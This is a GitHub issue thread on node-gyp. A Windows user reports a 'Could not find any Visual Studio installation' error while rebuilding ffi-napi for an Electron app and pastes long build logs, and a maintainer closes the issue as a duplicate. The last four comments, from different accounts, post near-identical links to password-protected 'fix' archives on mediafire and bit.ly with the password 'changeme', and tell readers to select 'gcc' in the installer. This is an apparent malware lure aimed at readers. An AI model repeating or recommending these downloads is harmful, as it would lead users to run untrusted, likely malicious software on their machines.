### ISSUE TITLE
Could not find any Visual Studio installation to use

### ISSUE THREAD

**Issue by uuidd** [nodejs/node-gyp#3063] opened 2024-08-27 07:59 UTC
env
windows10

python 3.12.5
msvs 2022
node 16.20.2
node-gyp 10.2.0
npm 8.19.4

I have been trying for two days and have tried many methods but nothing works.
I can't find any clues, I have to ask for help

<details><summary>Verbose output (from npm or node-gyp):</summary>

PS C:\>choco install python visualstudio2022-workload-vctools -y
```
Chocolatey v2.3.0
Installing the following packages:
python;visualstudio2022-workload-vctools
By installing, you accept licenses for the packages.
python v3.12.5 already installed.
 Use --force to reinstall, specify a version to install, or try upgrade.
visualstudio2022-workload-vctools v1.0.0 already installed.
 Use --force to reinstall, specify a version to install, or try upgrade.

Chocolatey installed 0/2 packages.
 See the log for details (C:\ProgramData\chocolatey\logs\chocolatey.log).

Warnings:
 - python - python v3.12.5 already installed.
 Use --force to reinstall, specify a version to install, or try upgrade.
 - visualstudio2022-workload-vctools - visualstudio2022-workload-vctools v1.0.0 already installed.
 Use --force to reinstall, specify a version to install, or try upgrade.

Enjoy using Chocolatey? Explore more amazing features to take your
experience to the next level at https://chocolatey.org/compare
```

PS C:\>  node-gyp list
```
gyp info it worked if it ends with ok
gyp info using node-gyp@10.2.0
gyp info using node@16.20.2 | win32 | x64
18.16.1
18.17.0
gyp info ok
```

</details>

```
> yarn install
yarn install v1.22.19
warning ..\..\package.json: No license field
[1/4] Resolving packages...
success Already up-to-date.
$ ts-node .erb/scripts/check-native-dep.js && electron-builder install-app-deps && cross-env NODE_ENV=development TS_NODE_TRANSPILE_ONLY=true webpack --config ./.erb/configs/webpack.config.renderer.dev.dll.ts && opencollective-p
ostinstall
  • electron-builder  version=22.13.1
  • loaded configuration  file=package.json ("build" field)
  • installing production dependencies  platform=win32 arch=x64 appDir=C:\Users\demo\Desktop\D2RMM\d2rmm\release\app
  ⨯ C:\Program Files\nodejs\node.exe exited with code ERR_ELECTRON_BUILDER_CANNOT_EXECUTE
Output:
yarn install v1.22.19
[1/4] Resolving packages...
success Already up-to-date.
$ npm run electron-rebuild && npm run link-modules

> d2rmm@1.7.3 electron-rebuild
> node -r ts-node/register ../../.erb/scripts/electron-rebuild.js

info Visit https://yarnpkg.com/en/docs/cli/install for documentation about this command.

Error output:
warning ..\..\..\..\package.json: No license field
- Searching dependency tree
× Rebuild Failed

An unhandled error occurred inside electron-rebuild
node-gyp failed to rebuild 'C:\Users\demo\Desktop\D2RMM\d2rmm\release\app\node_modules\ffi-napi'.
For more information, rerun with the DEBUG environment variable set to "electron-rebuild".

Error: Could not find any Visual Studio installation to use



Error: node-gyp failed to rebuild 'C:\Users\demo\Desktop\D2RMM\d2rmm\release\app\node_modules\ffi-napi'.
For more information, rerun with the DEBUG environment variable set to "electron-rebuild".

Error: Could not find any Visual Studio installation to use


    at NodeGyp.rebuildModule (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\module-type\node-gyp.js:117:19)
    at processTicksAndRejections (node:internal/process/task_queues:96:5)
    at async ModuleRebuilder.rebuildNodeGypModule (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\module-rebuilder.js:94:9)
    at async ModuleRebuilder.rebuild (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\module-rebuilder.js:124:14)
    at async Rebuilder.rebuildModuleAt (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\rebuild.js:145:13)
    at async Promise.all (index 4)
    at async Rebuilder.rebuild (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\rebuild.js:104:13)
    at async C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\cli.js:154:9
Error: Command failed: ..\..\node_modules\.bin\electron-rebuild --parallel --force --types prod,dev,optional --module-dir .
    at checkExecSyncError (node:child_process:861:11)
    at execSync (node:child_process:932:15)
    at Object.<anonymous> (C:\Users\demo\Desktop\D2RMM\d2rmm\.erb\scripts\electron-rebuild.js:17:11)
    at Module._compile (node:internal/modules/cjs/loader:1198:14)
    at Module.m._compile (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\ts-node\src\index.ts:1371:23)
    at Module._extensions..js (node:internal/modules/cjs/loader:1252:10)
    at Object.require.extensions.<computed> [as .js] (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\ts-node\src\index.ts:1374:12)
    at Module.load (node:internal/modules/cjs/loader:1076:32)
    at Function.Module._load (node:internal/modules/cjs/loader:911:12) {
  status: 4294967295,
  signal: null,
  output: [ null, null, null ],
  pid: 12824,
  stdout: null,
  stderr: null
}
error Command failed with exit code 1.
  failedTask=installAppDeps stackTrace=Error: C:\Program Files\nodejs\node.exe exited with code ERR_ELECTRON_BUILDER_CANNOT_EXECUTE
Output:
yarn install v1.22.19
[1/4] Resolving packages...
success Already up-to-date.
$ npm run electron-rebuild && npm run link-modules

> d2rmm@1.7.3 electron-rebuild
> node -r ts-node/register ../../.erb/scripts/electron-rebuild.js

info Visit https://yarnpkg.com/en/docs/cli/install for documentation about this command.

Error output:
warning ..\..\..\..\package.json: No license field
- Searching dependency tree
× Rebuild Failed

An unhandled error occurred inside electron-rebuild
node-gyp failed to rebuild 'C:\Users\demo\Desktop\D2RMM\d2rmm\release\app\node_modules\ffi-napi'.
For more information, rerun with the DEBUG environment variable set to "electron-rebuild".
Error: Could not find any Visual Studio installation to use
Error: node-gyp failed to rebuild 'C:\Users\demo\Desktop\D2RMM\d2rmm\release\app\node_modules\ffi-napi'.
For more information, rerun with the DEBUG environment variable set to "electron-rebuild".
Error: Could not find any Visual Studio installation to use
    at NodeGyp.rebuildModule (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\module-type\node-gyp.js:117:19)
    at processTicksAndRejections (node:internal/process/task_queues:96:5)
    at async ModuleRebuilder.rebuildNodeGypModule (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\module-rebuilder.js:94:9)
    at async ModuleRebuilder.rebuild (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\module-rebuilder.js:124:14)
    at async Rebuilder.rebuildModuleAt (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\rebuild.js:145:13)
    at async Promise.all (index 4)
    at async Rebuilder.rebuild (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\rebuild.js:104:13)
    at async C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\electron-rebuild\lib\src\cli.js:154:9
Error: Command failed: ..\..\node_modules\.bin\electron-rebuild --parallel --force --types prod,dev,optional --module-dir .
    at checkExecSyncError (node:child_process:861:11)
    at execSync (node:child_process:932:15)
    at Object.<anonymous> (C:\Users\demo\Desktop\D2RMM\d2rmm\.erb\scripts\electron-rebuild.js:17:11)
    at Module._compile (node:internal/modules/cjs/loader:1198:14)
    at Module.m._compile (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\ts-node\src\index.ts:1371:23)
    at Module._extensions..js (node:internal/modules/cjs/loader:1252:10)
    at Object.require.extensions.<computed> [as .js] (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\ts-node\src\index.ts:1374:12)
    at Module.load (node:internal/modules/cjs/loader:1076:32)
    at Function.Module._load (node:internal/modules/cjs/loader:911:12) {
  status: 4294967295,
  signal: null,
  output: [ null, null, null ],
  pid: 12824,
  stdout: null,
  stderr: null
}
error Command failed with exit code 1.
    at ChildProcess.<anonymous> (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\builder-util\src\util.ts:250:14)
    at Object.onceWrapper (node:events:628:26)
    at ChildProcess.emit (node:events:513:28)
    at ChildProcess.cp.emit (C:\Users\demo\Desktop\D2RMM\d2rmm\node_modules\cross-spawn\lib\enoent.js:34:29)
    at maybeClose (node:internal/child_process:1100:16)
    at Process.ChildProcess._handle.onexit (node:internal/child_process:304:5)
error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/install for documentation about this command.
```

**Comment by cclauss** [comment] 2024-08-27 08:08
Duplicate of
* node-ffi-napi/node-ffi-napi#269

**Closed by cclauss** 2024-08-27 08:08 UTC
Labels: Windows, ffi-napi, Visual Studio not found

**Comment by Viotemis** [comment] 2024-08-27 14:46
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment] 2024-08-27 16:36
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment] 2024-08-28 07:25
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment] 2024-08-28 07:43
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
